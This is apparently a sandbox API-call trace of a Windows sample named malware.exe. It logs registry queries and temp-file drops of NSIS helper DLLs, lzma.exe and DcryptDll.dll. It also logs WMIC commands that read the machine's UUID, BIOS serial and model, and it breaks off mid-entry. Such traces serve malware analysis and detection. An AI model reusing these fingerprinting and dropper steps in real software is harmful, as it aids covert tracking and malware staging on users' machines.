3188 malware.exe
#265290000
LoadLibrary
lpFileName=C:\WINDOWS\system32\IMM32.DLL
Return=76390000
#266110000
LoadLibrary
lpFileName=gdi32.dll
Return=77f10000
#265780000
LoadLibrary
lpFileName=LPK.DLL
Return=629c0000
#266360000
CreateFile
hName=C:\WINDOWS\WindowsShell.Manifest
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=44
#266630000
RegQueryValue
hKey=HKEY_CURRENT_USER\Control Panel\Desktop\SmoothScroll
Return=2
#266640000
RegQueryValue
hKey=HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\EnableBalloonTips
Return=2
#266650000
RegEnumValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\LanguagePack\SURR
Return=0
type=REG_DWORD
data=2
#266910000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\CriticalSectionTimeout
Return=0
#266910000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Ole\RWLockResourceTimeOut
Return=2
#267000000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
Return=0
#267300000
LoadLibrary
lpFileName=comctl32.dll
Return=773d0000
#267410000
LoadLibrary
lpFileName=comctl32.dll
Return=773d0000
#268380000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ThemeManager\Compositing
Return=2
#268410000
RegQueryValue
hKey=HKEY_CURRENT_USER\Control Panel\Desktop\LameButtonText
Return=2
#268430000
LoadLibrary
lpFileName=uxtheme.dll
Return=5ad70000
#270060000
LoadLibrary
lpFileName=SHFOLDER
Return=76780000
#270300000
LoadLibrary
lpFileName=ole32.dll
Return=774e0000
#270350000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood
Return=2
#270370000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
Return=2
#270390000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
Return=2
#270530000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
Return=2
#270580000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Return=2
#270600000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
Return=2
#270640000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Return=0
#271060000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\System\Setup\SystemSetupInProgress
Return=0
#271060000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\System\WPA\PnP\seed
Return=0
#271070000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\OsLoaderPath
Return=0
#271070000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\OsLoaderPath
Return=0
#271070000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition
Return=0
#271070000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition
Return=0
#271110000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath
Return=0
#271110000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath
Return=0
#271120000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\ServicePackSourcePath
Return=0
#271120000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\ServicePackSourcePath
Return=0
#271130000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\ServicePackCachePath
Return=2
#271130000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\DriverCachePath
Return=0
#271130000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\DriverCachePath
Return=0
#271150000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath
Return=0
#271170000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\LogLevel
Return=2
#271170000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\LogPath
Return=2
#270720000
LoadLibrary
lpFileName=SETUPAPI.dll
Return=77920000
#271290000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\MaxRpcSize
Return=2
#271340000
LoadLibrary
lpFileName=rpcrt4.dll
Return=77e70000
#271450000
CreateFile
hName=\\.\PIPE\lsarpc
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=98
#271560000
CreateFile
hName=\\.\PIPE\lsarpc
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=94
#271780000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#271800000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{4774220e-1640-11e4-bb1b-806d6172696f}\\Data
Return=0
#271810000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{4774220e-1640-11e4-bb1b-806d6172696f}\\Generation
Return=0
#271850000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#271870000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{6fc0686a-6791-11e1-b81a-806d6172696f}\\Data
Return=0
#271880000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{6fc0686a-6791-11e1-b81a-806d6172696f}\\Generation
Return=0
#271900000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#271910000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#271930000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6fc0686a-6791-11e1-b81a-806d6172696f}\
Return=0
#271930000
RegSetValue
hKey=9c\BaseClass
type=REG_SZ
data=Drive
Return=0
#271940000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#271950000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#271960000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4774220e-1640-11e4-bb1b-806d6172696f}\
Return=0
#271970000
RegSetValue
hKey=9c\BaseClass
type=REG_SZ
data=Drive
Return=0
#271980000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{6fc0686a-6791-11e1-b81a-806d6172696f}\\Generation
Return=0
#272020000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
Return=0
#272090000
LoadLibrary
lpFileName=SHELL32.dll
Return=7c9c0000
#272110000
LoadLibrary
lpFileName=ole32.dll
Return=774e0000
#272180000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
Return=2
#272180000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
Return=0
#272190000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
Return=0
#272200000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceActiveDesktopOn
Return=2
#272220000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop
Return=2
#272240000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
Return=2
#272270000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
Return=2
#272290000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
Return=2
#272310000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
Return=2
#272330000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
Return=2
#272330000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
Return=0
#272340000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
Return=0
#272340000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
Return=0
#272340000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
Return=0
#272340000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
Return=0
#272340000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
Return=0
#272340000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
Return=0
#272350000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
Return=0
#272350000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
Return=0
#272350000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
Return=2
#272350000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
Return=0
#272350000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
Return=2
#272380000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\DocObject
Return=2
#272390000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\BrowseInPlace
Return=2
#272440000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\IsShortcut
Return=2
#272460000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\AlwaysShowExt
Return=0
#272470000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\NeverShowExt
Return=2
#272660000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsn1.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=a8
#272680000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsn1.tmp
Return=1
#272680000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsn1.tmp
Return=1
#272700000
CreateFile
hName=C:\Documents and Settings\All Users\Desktop\malware.exe
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=a8
#272700000
CreateFile
hName=C:\Documents and Settings\All Users\Desktop\malware.exe
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=a8
#282510000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir
Return=0
#282680000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=9c
#282780000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp
Return=1
#282770000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp
Return=1
#283400000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=c
#283400000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=c
#286990000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#286990000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#287250000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#287250000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#287480000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#287480000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#287690000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#287690000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#287930000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#287930000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#288200000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#288200000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#288450000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#288450000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#288880000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#288880000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#289510000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#289510000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#289840000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#289840000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#290200000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#290200000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#290490000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ac
#290490000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ac
#291950000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns3.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=c
#291980000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#291980000
CopyFile
lpExistingFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
lpNewFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns3.tmp
Return=1
#292020000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns3.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#292020000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns3.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#293530000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
Return=0
#293570000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#292150000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns3.tmp" WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
Return=1
#292150000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns3.tmp" WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
Return=1
#292150000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns3.tmp" WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
Return=1
#301970000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns3.tmp
Return=1
#301970000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns3.tmp
Return=1
#302600000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#302600000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#303060000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns4.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=b4
#303080000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=b4
#303080000
CopyFile
lpExistingFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
lpNewFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns4.tmp
Return=1
#303130000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns4.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=b0
#303120000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns4.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=b0
#304150000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#303260000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns4.tmp" WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
Return=1
#303250000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns4.tmp" WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
Return=1
#303250000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns4.tmp" WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
Return=1
#309530000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns4.tmp
Return=1
#309530000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns4.tmp
Return=1
#309990000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#309990000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#310460000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns5.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=c
#310490000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#310490000
CopyFile
lpExistingFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
lpNewFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns5.tmp
Return=1
#310530000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns5.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#310530000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns5.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#311840000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#310660000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns5.tmp" WMIC bios Get Version /FORMAT:textvaluelist.xsl
Return=1
#310650000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns5.tmp" WMIC bios Get Version /FORMAT:textvaluelist.xsl
Return=1
#310650000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns5.tmp" WMIC bios Get Version /FORMAT:textvaluelist.xsl
Return=1
#317090000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns5.tmp
Return=1
#317090000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns5.tmp
Return=1
#317790000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#317790000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#318610000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns6.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=b4
#318640000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=b4
#318640000
CopyFile
lpExistingFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
lpNewFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns6.tmp
Return=1
#318710000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns6.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=b0
#318710000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns6.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=b0
#320520000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#318970000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns6.tmp" WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
Return=1
#318960000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns6.tmp" WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
Return=1
#318960000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns6.tmp" WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
Return=1
#326910000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns6.tmp
Return=1
#326910000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns6.tmp
Return=1
#328120000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\lzma.exe
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#328120000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\lzma.exe
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#340620000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\g10imao1b9m5a31
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#340620000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\g10imao1b9m5a31
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#340780000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\gw1jirkfqguoj
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#340780000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\gw1jirkfqguoj
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#341060000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\DcryptDll.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ac
#341060000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\DcryptDll.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ac
#344380000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\g10imao1b9m5a31
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#344380000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\g10imao1b9m5a31
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#344430000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\gw1jirkfqguoj
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#344430000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\gw1jirkfqguoj
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#344440000
CreateFile
hName=3wsh81ka6f1kkt1hwi
